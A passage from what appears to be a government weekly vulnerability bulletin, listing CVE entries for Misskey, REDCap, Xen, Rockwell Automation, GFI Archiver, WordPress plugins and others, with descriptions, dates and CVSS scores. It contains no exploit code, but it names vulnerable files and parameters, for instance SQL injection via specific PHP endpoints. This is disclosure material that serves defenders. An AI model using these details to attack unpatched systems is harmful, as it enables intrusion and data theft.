Misskey is an open source, federated social media platform.In affected versions missing validation in `NoteCreateService.insertNote`, `ApPersonService.createPerson`, and `ApPersonService.updatePerson` allows an attacker to control the target of any "origin" links (such as the "view on remote instance" banner). Any HTTPS URL can be set, even if it belongs to a different domain than the note / user. Vulnerable Misskey instances will use the unverified URL for several clickable links, allowing an attacker to conduct phishing or other attacks against remote users. This issue has been addressed in version 2024.11.0-alpha.3. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-12-18 | not yet calculated | CVE-2024-52593 |
| n/a--n/a |
A reflected cross-site scripting vulnerability in MONITORAPP Application Insight Web Application Firewall (AIWAF) <= 4.1.6 and <=5.0 was identified on the subpage `/process_management/process_status.xhr.php`. This vulnerability allows an attacker to inject malicious scripts that execute in the context of the victim's session. | 2024-12-20 | not yet calculated | CVE-2021-40959 |
| n/a--n/a |
OpenCart 4.0.2.3 is vulnerable to Server-Side Template Injection (SSTI) via the Theme Editor Function. | 2024-12-18 | not yet calculated | CVE-2024-36694 |
| n/a--n/a |
Insecure Permissions vulnerability in SecureSTATION v.2.5.5.3116-S50-SMA-B20160811A and before allows a physically proximate attacker to obtain sensitive information via the modification of user credentials. | 2024-12-18 | not yet calculated | CVE-2024-37649 |
| n/a--n/a |
iperf v3.17.1 was discovered to contain a segmentation violation via the iperf_exchange_parameters() function. | 2024-12-18 | not yet calculated | CVE-2024-53580 |
| n/a--n/a |
An issue was discovered in the Webmail Classic UI in Zimbra Collaboration (ZCS) 9.0 and 10.0 and 10.1. A Local File Inclusion (LFI) vulnerability exists in the /h/rest endpoint, allowing authenticated remote attackers to include and access sensitive files in the WebRoot directory. Exploitation requires a valid auth token and involves crafting a malicious request targeting specific file paths. | 2024-12-19 | not yet calculated | CVE-2024-54663 |
| n/a--n/a |
An issue in Quectel BC25 with firmware version BC25PAR01A06 allows attackers to bypass authentication via a crafted NAS message. | 2024-12-19 | not yet calculated | CVE-2024-54982 |
| n/a--n/a |
An issue in Quectel BC95-CNV V100R001C00SPC051 allows attackers to bypass authentication via a crafted NAS message. | 2024-12-19 | not yet calculated | CVE-2024-54983 |
| n/a--n/a |
An issue in Quectel BG96 BG96MAR02A08M1G allows attackers to bypass authentication via a crafted NAS message. | 2024-12-19 | not yet calculated | CVE-2024-54984 |
| n/a--n/a |
An XML External Entity (XXE) injection vulnerability in the component /datagrip/upload of Chat2DB v0.3.5 allows attackers to execute arbitrary code via supplying a crafted XML input. | 2024-12-19 | not yet calculated | CVE-2024-55081 |
| n/a--n/a |
A Server-Side Request Forgery (SSRF) in the endpoint http://{your-server}/url-to-pdf of Stirling-PDF 0.35.1 allows attackers to access sensitive information via a crafted request. | 2024-12-19 | not yet calculated | CVE-2024-55082 |
| n/a--n/a |
Rhymix 2.1.19 is vulnerable to Server-Side Request Forgery (SSRF) in the background import data function. | 2024-12-18 | not yet calculated | CVE-2024-55089 |
| n/a--n/a |
Insufficiently Protected Credentials in the Mail Server Configuration in GoPhish v0.12.1 allows an attacker to access cleartext passwords for the configured IMAP and SMTP servers. | 2024-12-19 | not yet calculated | CVE-2024-55196 |
| n/a--n/a |
An IDOR vulnerability in the edit-notes.php module of PHPGurukul Online Notes Sharing Management System v1.0 allows unauthorized users to modify notes belonging to other accounts due to missing authorization checks. This flaw exposes sensitive data and enables attackers to alter another user's information. | 2024-12-18 | not yet calculated | CVE-2024-55231 |
| n/a--n/a |
An IDOR vulnerability in the manage-notes.php module in PHPGurukul Online Notes Sharing Management System v1.0 allows unauthorized users to delete notes belonging to other accounts due to missing authorization checks. This flaw enables attackers to delete another user's information. | 2024-12-18 | not yet calculated | CVE-2024-55232 |
| n/a--n/a |
A reflected Cross-Site Scripting vulnerability in the standard documentation upload functionality in Portabilis i-Educar 2.9 allows attacker to craft malicious urls with arbitrary javascript in the 'titulo_documento' parameter. | 2024-12-18 | not yet calculated | CVE-2024-55239 |
| n/a--n/a |
SeaCMS <=13.0 is vulnerable to command execution in phome.php via the function Ebak_RepPathFiletext(). | 2024-12-18 | not yet calculated | CVE-2024-55461 |
| n/a--n/a |
An issue in CodeAstro Complaint Management System v.1.0 allows a remote attacker to escalate privileges via the mess-view.php component. | 2024-12-18 | not yet calculated | CVE-2024-55505 |
| n/a--n/a |
An IDOR vulnerability in CodeAstro's Complaint Management System v1.0 (version with 0 updates) enables an attacker to execute arbitrary code and obtain sensitive information via the delete.php file and modifying the id parameter. | 2024-12-18 | not yet calculated | CVE-2024-55506 |
| n/a--n/a |
SQL injection vulnerability in CodeAstro Complaint Management System v.1.0 allows a remote attacker to execute arbitrary code and escalate privileges via the id parameter of the delete.php component. | 2024-12-20 | not yet calculated | CVE-2024-55509 |
| n/a--n/a |
A vulnerability in Amiro.CMS before 7.8.4 exists due to the failure to take measures to neutralize special elements. It allows remote attackers to conduct a Cross-Site Scripting (XSS) attack. | 2024-12-18 | not yet calculated | CVE-2024-56115 |
| n/a--n/a |
A Cross-Site Request Forgery vulnerability in Amiro.CMS before 7.8.4 allows remote attackers to create an administrator account. | 2024-12-18 | not yet calculated | CVE-2024-56116 |
| n/a--n/a |
A validation integrity issue was discovered in Fort through 1.6.4 before 2.0.0. RPKI Relying Parties (such as Fort) are supposed to maintain a backup cache of the remote RPKI data. This can be employed as a fallback in case a new fetch fails or yields incorrect files. However, the product currently uses its cache merely as a bandwidth saving tool (because fetching is performed through deltas). If a fetch fails midway or yields incorrect files, there is no viable fallback. This leads to incomplete route origin validation data. | 2024-12-18 | not yet calculated | CVE-2024-56169 |
| n/a--n/a |
A validation integrity issue was discovered in Fort through 1.6.4 before 2.0.0. RPKI manifests are listings of relevant files that clients are supposed to verify. Assuming everything else is correct, the most recent version of a manifest should be prioritized over other versions, to prevent replays, accidental or otherwise. Manifests contain the manifestNumber and thisUpdate fields, which can be used to gauge the relevance of a given manifest, when compared to other manifests. The former is a serial-like sequential number, and the latter is the date on which the manifest was created. However, the product does not compare the up-to-dateness of the most recently fetched manifest against the cached manifest. As such, it's prone to a rollback to a previous version if it's served a valid outdated manifest. This leads to outdated route origin validation. | 2024-12-18 | not yet calculated | CVE-2024-56170 |
| n/a--n/a |
REDCap through 15.0.0 has a security flaw in the Project Dashboards name, exposing users to a Cross-Site Request Forgery (CSRF) attack. An attacker can exploit this by luring users into clicking on a Project Dashboards name that contains the malicious payload, which triggers a logout request and terminates their session. This vulnerability stems from the absence of CSRF protections on the logout functionality, allowing malicious actions to be executed without user consent. | 2024-12-22 | not yet calculated | CVE-2024-56310 |
| n/a--n/a |
REDCap through 15.0.0 has a security flaw in the Notes section of calendar events, exposing users to a Cross-Site Request Forgery (CSRF) attack. An attacker can exploit this by luring users into accessing a calendar event's notes, which triggers a logout request and terminates their session. This vulnerability stems from the absence of CSRF protections on the logout functionality, allowing malicious actions to be executed without user consent. | 2024-12-22 | not yet calculated | CVE-2024-56311 |
| n/a--n/a |
A stored cross-site scripting (XSS) vulnerability in the Project Dashboard name of REDCap through 15.0.0 allows authenticated users to inject malicious scripts into the name field of a Project Dashboard. When a user clicks on the project Dashboard name, the crafted payload is executed, potentially enabling the execution of arbitrary web scripts. | 2024-12-22 | not yet calculated | CVE-2024-56312 |
| n/a--n/a |
A stored cross-site scripting (XSS) vulnerability in the Calendar feature of REDCap through 15.0.0 allows authenticated users to inject malicious scripts into the Notes field of a calendar event. When the event is viewed, the crafted payload is executed, potentially enabling the execution of arbitrary web scripts. | 2024-12-22 | not yet calculated | CVE-2024-56313 |
| n/a--n/a |
A stored cross-site scripting (XSS) vulnerability in the Project name of REDCap through 15.0.0 allows authenticated users to inject malicious scripts into the name field of a Project. When a user clicks on the project name to access it, the crafted payload is executed, potentially enabling the execution of arbitrary web scripts. | 2024-12-22 | not yet calculated | CVE-2024-56314 |
| n/a--n/a |
An integer underflow was discovered in Fort 1.6.3 and 1.6.4 before 1.6.5. A malicious RPKI repository that descends from a (trusted) Trust Anchor can serve (via rsync or RRDP) a Manifest RPKI object containing an empty fileList. Fort dereferences (and, shortly afterwards, writes to) this array during a shuffle attempt, before the validation that would normally reject it when empty. This out-of-bounds access is caused by an integer underflow that causes the surrounding loop to iterate infinitely. Because the product is permanently stuck attempting to overshuffle an array that doesn't actually exist, a crash is nearly guaranteed. | 2024-12-22 | not yet calculated | CVE-2024-56375 |
| Netskope Inc.--Endpoint DLP |
Netskope was made aware of a security vulnerability in Netskope Endpoint DLP's Content Control Driver where a double-fetch issue leads to heap overflow. The vulnerability arises from the fact that the NumberOfBytes argument to ExAllocatePoolWithTag, and the Length argument for RtlCopyMemory, both independently dereference their value from the user supplied input buffer inside the EpdlpSetUsbAction function, known as a double-fetch. If this length value grows to a higher value in between these two calls, it will result in the RtlCopyMemory call copying user-supplied memory contents outside the range of the allocated buffer, resulting in a heap overflow. A malicious attacker will need admin privileges to exploit the issue. This issue affects Endpoint DLP version below R119. | 2024-12-19 | not yet calculated | CVE-2024-11616 |
| OpenText--Operations Bridge Manager |
Improper Restriction of XML External Entity Reference vulnerability in OpenText™ Operations Bridge Manager allows Input Data Manipulation. The vulnerability could be exploited to confidential information This issue affects Operations Bridge Manager: 2017.05, 2017.11, 2018.05, 2018.11, 2019.05, 2019.11, 2020.05, 2020.10. | 2024-12-19 | not yet calculated | CVE-2021-22501 |
| phpLDAPadmin--phpLDAPadmin |
A reflected cross-site scripting (XSS) vulnerability in the 'Entry Chooser' of phpLDAPadmin (version 1.2.1 through the latest version, 1.2.6.7) allows attackers to execute arbitrary JavaScript in the user's browser via the 'element' parameter, which is unsafely passed to the JavaScript 'eval' function. However, exploitation is limited to specific conditions where 'opener' is correctly set. | 2024-12-19 | not yet calculated | CVE-2024-9101 |
| phpLDAPadmin--phpLDAPadmin |
phpLDAPadmin since at least version 1.2.0 through the latest version 1.2.6.7 allows users to export elements from the LDAP directory into a Comma-Separated Value (CSV) file, but it does not neutralize special elements that could be interpreted as a command when the file is opened by a spreadsheet product. Thus, this could lead to CSV Formula Injection. | 2024-12-19 | not yet calculated | CVE-2024-9102 |
| PlexTrac--PlexTrac |
Deserialization of Untrusted Data vulnerability in PlexTrac (Runbooks modules) which allows Object Injection and arbitrary file writes. This issue affects PlexTrac: from 1.61.3 before 2.8.1. | 2024-12-16 | not yet calculated | CVE-2024-12687 |
| QOS.CH Sarl--logback |
Server-Side Request Forgery (SSRF) in SaxEventRecorder by QOS.CH logback version 1.5.12 on the Java platform, allows an attacker to forge requests by compromising logback configuration files in XML. The attacks involves the modification of DOCTYPE declaration in XML configuration files. | 2024-12-19 | not yet calculated | CVE-2024-12801 |
| QOS.CH Sarl--Logback-core |
ACE vulnerability in JaninoEventEvaluator by QOS.CH logback-core upto and including version 1.5.12 in Java applications allows attacker to execute arbitrary code by compromising an existing logback configuration file or by injecting an environment variable before program execution. Malicious logback configuration files can allow the attacker to execute arbitrary code using the JaninoEventEvaluator extension. A successful attack requires the user to have write access to a configuration file. Alternatively, the attacker could inject a malicious environment variable pointing to a malicious configuration file. In both cases, the attack requires existing privilege. | 2024-12-19 | not yet calculated | CVE-2024-12798 |
| Red Hat--Fast Datapath for RHEL 7 |
An out-of-bounds read vulnerability was found in DPDK's Vhost library checksum offload feature. This issue enables an untrusted or compromised guest to crash the hypervisor's vSwitch by forging Virtio descriptors to cause out-of-bounds reads. This flaw allows an attacker with a malicious VM using a virtio driver to cause the vhost-user side to crash by sending a packet with a Tx checksum offload request and an invalid csum_start offset. | 2024-12-18 | not yet calculated | CVE-2024-11614 |
| Rockwell Automation--Arena |
A third-party vulnerability exists in the Rockwell Automation Arena® that could allow a threat actor to write beyond the boundaries of allocated memory in a DOE file. If exploited, a threat actor could leverage this vulnerability to execute arbitrary code. To exploit this vulnerability, a legitimate user must execute the malicious code crafted by the threat actor. | 2024-12-19 | not yet calculated | CVE-2024-11157 |
| Rockwell Automation--Arena |
Another "uninitialized variable" code execution vulnerability exists in the Rockwell Automation Arena® that could allow a threat actor to craft a DOE file and force the software to access a variable prior to it being initialized. If exploited, a threat actor could leverage this vulnerability to execute arbitrary code. To exploit this vulnerability, a legitimate user must execute the malicious code crafted by the threat actor. | 2024-12-19 | not yet calculated | CVE-2024-11364 |
| Rockwell Automation--Arena |
Another "use after free" code execution vulnerability exists in the Rockwell Automation Arena® that could allow a threat actor to craft a DOE file and force the software to use a resource that was already used. If exploited, a threat actor could leverage this vulnerability to execute arbitrary code. To exploit this vulnerability, a legitimate user must execute the malicious code crafted by the threat actor. | 2024-12-19 | not yet calculated | CVE-2024-12175 |
| Rockwell Automation--Arena |
A third-party vulnerability exists in the Rockwell Automation Arena® that could allow a threat actor to write beyond the boundaries of allocated memory in a DOE file. If exploited, a threat actor could leverage this vulnerability to execute arbitrary code. To exploit this vulnerability, a legitimate user must execute the malicious code crafted by the threat actor. | 2024-12-19 | not yet calculated | CVE-2024-12672 |
| Rockwell Automation--PM1k 1408-BC3A-485 |
A device takeover vulnerability exists in the Rockwell Automation Power Monitor 1000. This vulnerability allows configuration of a new Policyholder user without any authentication via API. Policyholder user is the most privileged user that can perform edit operations, creating admin users and performing factory reset. | 2024-12-18 | not yet calculated | CVE-2024-12371 |
| Rockwell Automation--PM1k 1408-BC3A-485 |
A denial-of-service and possible remote code execution vulnerability exists in the Rockwell Automation Power Monitor 1000. The vulnerability results in corruption of the heap memory which may compromise the integrity of the system, potentially allowing for remote code execution or a denial-of-service attack. | 2024-12-18 | not yet calculated | CVE-2024-12372 |
| Rockwell Automation--PM1k 1408-BC3A-485 |
A denial-of-service vulnerability exists in the Rockwell Automation Power Monitor 1000. The vulnerability results in a buffer-overflow, potentially causing denial-of-service. | 2024-12-18 | not yet calculated | CVE-2024-12373 |
| SHUEISHA INC.--"Shonen Jump+" App for Android |
Improper authorization in handler for custom URL scheme issue in "Shonen Jump+" App for Android versions prior to 4.0.0 allows an attacker to lead a user to access an arbitrary website via the vulnerable App. As a result, the user may become a victim of a phishing attack. | 2024-12-17 | not yet calculated | CVE-2024-54125 |
| Sierra Wireless--MGOS |
A command injection is possible through the user interface, allowing arbitrary command execution as the root user. oMG2000 running MGOS 3.15.1 or earlier is affected. MG90 running MGOS 4.2.1 or earlier is affected. | 2024-12-20 | not yet calculated | CVE-2020-13712 |
| spaceness--stardust |
Stardust is a platform for streaming isolated desktop containers. With this exploit, inter container communication (ICC) is not disabled. This would allow users within a container to access another containers agent, therefore compromising access.The problem has been patched in any Stardust build past 12/20/24. Users are advised to upgrade. Users may also manually disable ICC if they are unable to upgrade. | 2024-12-20 | not yet calculated | CVE-2024-56330 |
| Unknown--GTPayment Donations |
The GTPayment Donations WordPress plugin through 1.0.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack. | 2024-12-21 | not yet calculated | CVE-2024-11607 |
| withastro--astro |
Astro is a web framework for content-driven websites. A bug in the build process allows any unauthenticated user to read parts of the server source code. During build, along with client assets such as css and font files, the sourcemap files **for the server code** are moved to a publicly-accessible folder. Any outside party can read them with an unauthorized HTTP GET request to the same server hosting the rest of the website. While some server files are hashed, making their access obscure, the files corresponding to the file system router (those in `src/pages`) are predictably named. For example. the sourcemap file for `src/pages/index.astro` gets named `dist/client/pages/index.astro.mjs.map`. This vulnerability is the root cause of issue #12703, which links to a simple stackblitz project demonstrating the vulnerability. Upon build, notice the contents of the `dist/client` (referred to as `config.build.client` in astro code) folder. All astro servers make the folder in question accessible to the public internet without any authentication. It contains `.map` files corresponding to the code that runs on the server. All **server-output** projects on Astro 5 versions **v5.0.3** through **v5.0.7**, that have **sourcemaps enabled**, either directly or through an add-on such as `sentry`, are affected. The fix for **server-output** projects was released in **astro@5.0.8**. Additionally, all **static-output** projects built using Astro 4 versions **4.16.17 or older**, or Astro 5 versions **5.0.8 or older**, that have **sourcemaps enabled** are also affected. The fix for **static-output** projects was released in **astro@5.0.9**, and backported to Astro v4 in **astro@4.16.18**. The immediate impact is limited to source code. Any secrets or environment variables are not exposed unless they are present verbatim in the source code. There is no immediate loss of integrity within the the vulnerable server. However, it is possible to subsequently discover another vulnerability via the revealed source code . There is no immediate impact to availability of the vulnerable server. However, the presence of an unsafe regular expression, for example, can quickly be exploited to subsequently compromise the availability. The fix for **server-output** projects was released in **astro@5.0.8**, and the fix for **static-output** projects was released in **astro@5.0.9** and backported to Astro v4 in **astro@4.16.18**. Users are advised to update immediately if they are using sourcemaps or an integration that enables sourcemaps. | 2024-12-19 | not yet calculated | CVE-2024-56159 |
| Xen--Xen |
A cross-privilege Spectre v2 vulnerability allows attackers to bypass all deployed mitigations, including the recent Fine(IBT), and to leak arbitrary Linux kernel memory on Intel systems. | 2024-12-19 | not yet calculated | CVE-2024-2201 |
| Xen--Xen |
The hypervisor contains code to accelerate VGA memory accesses for HVM guests, when the (virtual) VGA is in "standard" mode. Locking involved there has an unusual discipline, leaving a lock acquired past the return from the function that acquired it. This behavior results in a problem when emulating an instruction with two memory accesses, both of which touch VGA memory (plus some further constraints which aren't relevant here). When emulating the 2nd access, the lock that is already being held would be attempted to be re-acquired, resulting in a deadlock. This deadlock was already found when the code was first introduced, but was analysed incorrectly and the fix was incomplete. Analysis in light of the new finding cannot find a way to make the existing locking discipline work. In staging, this logic has all been removed because it was discovered to be accidentally disabled since Xen 4.7. Therefore, we are fixing the locking problem by backporting the removal of most of the feature. Note that even with the feature disabled, the lock would still be acquired for any accesses to the VGA MMIO region. | 2024-12-19 | not yet calculated | CVE-2024-45818 |
| Xen--Xen |
PVH guests have their ACPI tables constructed by the toolstack. The construction involves building the tables in local memory, which are then copied into guest memory. While actually used parts of the local memory are filled in correctly, excess space that is being allocated is left with its prior contents. | 2024-12-19 | not yet calculated | CVE-2024-45819 |
Vulnerability Summary for the Week of December 9, 2024
Posted on Monday December 16, 2024
High Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| n/a -- n/a |
The Vayu Blocks - Gutenberg Blocks for WordPress & WooCommerce plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation and activation due to a missing capability check on the tp_install() function in all versions up to, and including, 1.1.1. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated. This vulnerability was partially patched in version 1.1.1. | 2024-12-12 | 9.8 | CVE-2024-10124 |
| n/a -- n/a |
The Sign In With Google plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.8.0. This is due to the 'authenticate_user' user function not implementing sufficient null value checks when setting the access token and user information. This makes it possible for unauthenticated attackers to log in as the first user who has signed in using Google OAuth, which could be the site administrator. | 2024-12-12 | 9.8 | CVE-2024-11015 |
| gfi -- archiver |
GFI Archiver Telerik Web UI Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GFI Archiver. Authentication is not required to exploit this vulnerability. The specific flaw exists within the product installer. The issue results from the use of a vulnerable version of Telerik Web UI. An attacker can leverage this vulnerability to execute code in the context of NETWORK SERVICE. Was ZDI-CAN-24041. | 2024-12-12 | 9.8 | CVE-2024-11948 |
| totolink -- ex1800t_firmware |
A vulnerability classified as problematic was found in TOTOLINK EX1800T 9.1.0cu.2112_B20220316. This vulnerability affects the function sub_40662C of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument ssid leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-09 | 9.8 | CVE-2024-12352 |
| codezips -- technical_discussion_forum |
A vulnerability classified as critical was found in Codezips Technical Discussion Forum 1.0. This vulnerability affects unknown code of the file /signuppost.php. The manipulation of the argument Username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | 2024-12-12 | 9.8 | CVE-2024-12484 |
| 1000projects -- attendance_tracking_management_system |
A vulnerability classified as critical has been found in 1000 Projects Attendance Tracking Management System 1.0. Affected is an unknown function of the file /admin/check_admin_login.php. The manipulation of the argument admin_user_name leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-12 | 9.8 | CVE-2024-12497 |
| apple -- ipados |
The issue was addressed with improved bounds checks. This issue is fixed in iOS 18.1 and iPadOS 18.1. An attacker may be able to cause unexpected system termination or arbitrary code execution in DCP firmware. | 2024-12-12 | 9.8 | CVE-2024-44299 |
| n/a -- n/a |
Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability | 2024-12-12 | 9.8 | CVE-2024-49112 |
| apple -- macos |
A logic issue was addressed with improved state management. This issue is fixed in macOS Sequoia 15.2. An app may be able to elevate privileges. | 2024-12-12 | 9.8 | CVE-2024-54465 |
| apple -- macos |
An out-of-bounds access issue was addressed with improved bounds checking. This issue is fixed in macOS Sequoia 15.2. An attacker may be able to cause unexpected system termination or arbitrary code execution in DCP firmware. | 2024-12-12 | 9.8 | CVE-2024-54506 |
| apple -- watchos |
The issue was addressed with improved memory handling. This issue is fixed in watchOS 11.2, visionOS 2.2, tvOS 18.2, macOS Sequoia 15.2, Safari 18.2, iOS 18.2 and iPadOS 18.2. Processing maliciously crafted web content may lead to memory corruption. | 2024-12-12 | 9.8 | CVE-2024-54534 |
| lopalopa -- e-learning_management_system |
A SQL Injection vulnerability was found in /teacher_signup.php of kashipara E-learning Management System v1.0, which allows remote attackers to execute arbitrary SQL command to get unauthorized database access via the firstname, lastname, and class_id parameters. | 2024-12-09 | 9.8 | CVE-2024-54920 |
| n/a -- n/a |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Eryaz Information Technologies NatraCar B2B Dealer Management Program allows SQL Injection.This issue affects NatraCar B2B Dealer Management Program: through 09.12.2024. NOTE: The vendor was contacted and it was learned that the product is not supported. | 2024-12-09 | 9.8 | CVE-2024-8259 |
| n/a -- n/a |
The Super Backup & Clone - Migrate for WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation and a missing capability check on the ibk_restore_migrate_check() function in all versions up to, and including, 2.3.3. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2024-12-13 | 9.8 | CVE-2024-9290 |
| n/a -- n/a |
Deserialization of untrusted data in Microsoft Update Catalog allows an unauthorized attacker to elevate privileges on the website's webserver. | 2024-12-12 | 9.3 | CVE-2024-49147 |
| n/a -- n/a |
Adobe Connect versions 12.6, 11.4.7 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 9.3 | CVE-2024-54032 |
| n/a -- n/a |
The Opt-In Downloads plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the admin_upload() function in all versions up to, and including, 4.07. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. Due to the presence of an .htaccess file, this can only be exploited to achieve RCE on NGINX servers, unless another vulnerability is present. | 2024-12-12 | 8.8 | CVE-2024-10590 |
| n/a -- n/a |
The de:branding plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the debranding_save() function in all versions up to, and including, 1.0.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site. | 2024-12-12 | 8.8 | CVE-2024-11443 |
| n/a -- n/a |
The HQ Rental Software plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5.29. This is due to missing or incorrect nonce validation on the displaySettingsPage() function. This makes it possible for unauthenticated attackers to update arbitrary options that can be leveraged for privilege escalation via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-12-12 | 8.8 | CVE-2024-11689 |
| gfi -- archiver |
GFI Archiver Core Service Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GFI Archiver. Authentication is required to exploit this vulnerability. The specific flaw exists within the Core Service, which listens on TCP port 8017 by default. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-24029. | 2024-12-12 | 8.8 | CVE-2024-11947 |
| gfi -- archiver |
GFI Archiver Store Service Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GFI Archiver. Authentication is required to exploit this vulnerability. The specific flaw exists within the Store Service, which listens on TCP port 8018 by default. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-24331. | 2024-12-12 | 8.8 | CVE-2024-11949 |
| n/a -- n/a |
The Product Carousel Slider & Grid Ultimate for WooCommerce plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.9.10 via the 'theme' attribute of the `wcpcsu` shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other "safe" file types can be uploaded and included. | 2024-12-12 | 8.8 | CVE-2024-12040 |
| jwillber -- jfinalcms |
A vulnerability was found in JFinalCMS 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/tag/save. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-09 | 8.8 | CVE-2024-12349 |
| jwillber -- jfinalcms |
A vulnerability was found in JFinalCMS 1.0. It has been rated as critical. Affected by this issue is the function update of the file \src\main\java\com\cms\controller\admin\TemplateController.java of the component Template Handler. The manipulation of the argument content leads to command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-09 | 8.8 | CVE-2024-12350 |
| jwillber -- jfinalcms |
A vulnerability classified as critical has been found in JFinalCMS 1.0. This affects the function findPage of the file src\main\java\com\cms\entity\ContentModel.java of the component File Content Handler. The manipulation of the argument name leads to sql injection. It is possible to initiate the attack remotely. | 2024-12-09 | 8.8 | CVE-2024-12351 |
| datax-web_project -- datax-web |
A vulnerability was found in WeiYe-Jing datax-web 2.1.1. It has been classified as critical. This affects an unknown part of the file /api/job/add/. The manipulation of the argument glueSource leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-09 | 8.8 | CVE-2024-12358 |
| online_class_and_exam_scheduling_system_project -- online_class_and_exam_scheduling_system |
A vulnerability was found in code-projects Online Class and Exam Scheduling System 1.0. It has been rated as critical. This issue affects some unknown processing of the file class_update.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-09 | 8.8 | CVE-2024-12360 |
| google -- chrome |
Type Confusion in V8 in Google Chrome prior to 131.0.6778.139 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2024-12-12 | 8.8 | CVE-2024-12381 |
| google -- chrome |
Use after free in Translate in Google Chrome prior to 131.0.6778.139 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2024-12-12 | 8.8 | CVE-2024-12382 |
| cjbi -- wetech-cms |
A vulnerability was found in cjbi wetech-cms 1.0/1.1/1.2 and classified as critical. This issue affects the function searchTopicByKeyword of the file wetech-cms-master\wetech-core\src\main\java\tech\wetech\cms\dao\TopicDao.java. The manipulation of the argument keyword leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-12-12 | 8.8 | CVE-2024-12479 |
| cjbi -- wetech-cms |
A vulnerability was found in cjbi wetech-cms 1.0/1.1/1.2. It has been classified as critical. Affected is the function searchTopic of the file wetech-cms-master\wetech-core\src\main\java\tech\wetech\cms\dao\TopicDao.java. The manipulation of the argument con leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-12-12 | 8.8 | CVE-2024-12480 |
| cjbi -- wetech-cms |
A vulnerability was found in cjbi wetech-cms 1.0/1.1/1.2. It has been declared as critical. Affected by this vulnerability is the function findUser of the file wetech-cms-master\wetech-core\src\main\java\tech\wetech\cms\dao\UserDao.java. The manipulation of the argument searchValue/gId/rId leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-12-12 | 8.8 | CVE-2024-12481 |
| fabian -- online_class_and_exam_scheduling_system |
A vulnerability, which was classified as critical, has been found in code-projects Online Class and Exam Scheduling System 1.0. This issue affects some unknown processing of the file /pages/department.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-12 | 8.8 | CVE-2024-12485 |
| fabian -- online_class_and_exam_scheduling_system |
A vulnerability, which was classified as critical, was found in code-projects Online Class and Exam Scheduling System 1.0. Affected is an unknown function of the file /pages/rank_update.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-12 | 8.8 | CVE-2024-12486 |
| fabian -- online_class_and_exam_scheduling_system |
A vulnerability has been found in code-projects Online Class and Exam Scheduling System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /pages/room_update.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-12 | 8.8 | CVE-2024-12487 |
| fabian -- online_class_and_exam_scheduling_system |
